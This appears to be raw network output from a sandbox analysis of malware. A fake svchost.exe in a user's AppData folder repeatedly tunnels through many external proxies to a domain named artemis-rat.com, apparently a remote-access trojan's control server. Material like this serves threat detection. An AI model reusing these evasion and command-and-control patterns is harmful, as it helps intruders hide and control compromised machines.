                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3474192.168.2.5609785.44.42.1155838643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.612375021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3475192.168.2.5609861.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.621536970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3476192.168.2.560984106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.644799948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3477192.168.2.560664178.128.200.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.645279884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3478192.168.2.560983138.2.73.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.667685032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3479192.168.2.56078851.15.139.591637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.672277927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3480192.168.2.560175142.54.226.214414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.674263954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3481192.168.2.560852137.184.100.1358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.701417923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3482192.168.2.55994759.124.62.9312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.729679108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3483192.168.2.561006104.19.83.1288043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.731926918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.886523008 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3484192.168.2.56099243.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.740544081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3485192.168.2.56117743.153.175.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.761375904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3486192.168.2.56118543.153.175.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.764889002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3487192.168.2.56119243.153.175.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.767954111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3488192.168.2.560869139.162.238.1842224343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.768064976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3489192.168.2.56119543.153.175.4344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.770860910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3490192.168.2.561083172.67.181.328043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.800712109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.954778910 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3491192.168.2.56107434.49.208.2218043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.809732914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3492192.168.2.559948103.69.87.142312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.810033083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3493192.168.2.561058162.240.208.984370443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.812613010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366025925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974184036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3494192.168.2.560995200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.817298889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3495192.168.2.561112104.19.85.2148043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.822474957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.976823092 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3496192.168.2.560993193.84.89.202844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.826975107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3497192.168.2.560990211.93.2.190730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.837344885 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:37.312161922 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3498192.168.2.55734312.186.205.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.842144966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.031554937 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3499192.168.2.5609975.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.843518972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3500192.168.2.56099478.30.128.10808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.848723888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3501192.168.2.55735567.227.186.235767643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.854132891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3502192.168.2.56100418.134.236.231312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.860161066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.154220104 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3503192.168.2.561088162.223.94.1668043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.867439032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.224852085 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3504192.168.2.561094199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.875287056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3505192.168.2.56100795.164.89.123888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.879527092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3506192.168.2.557306104.248.158.786172543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.884104967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3507192.168.2.56101192.205.110.118789543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.891103029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677169085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677710056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3508192.168.2.56104735.79.120.242312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.893596888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.159615993 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3509192.168.2.561017195.90.216.75108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.900515079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3510192.168.2.561013110.12.211.1408043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.907151937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
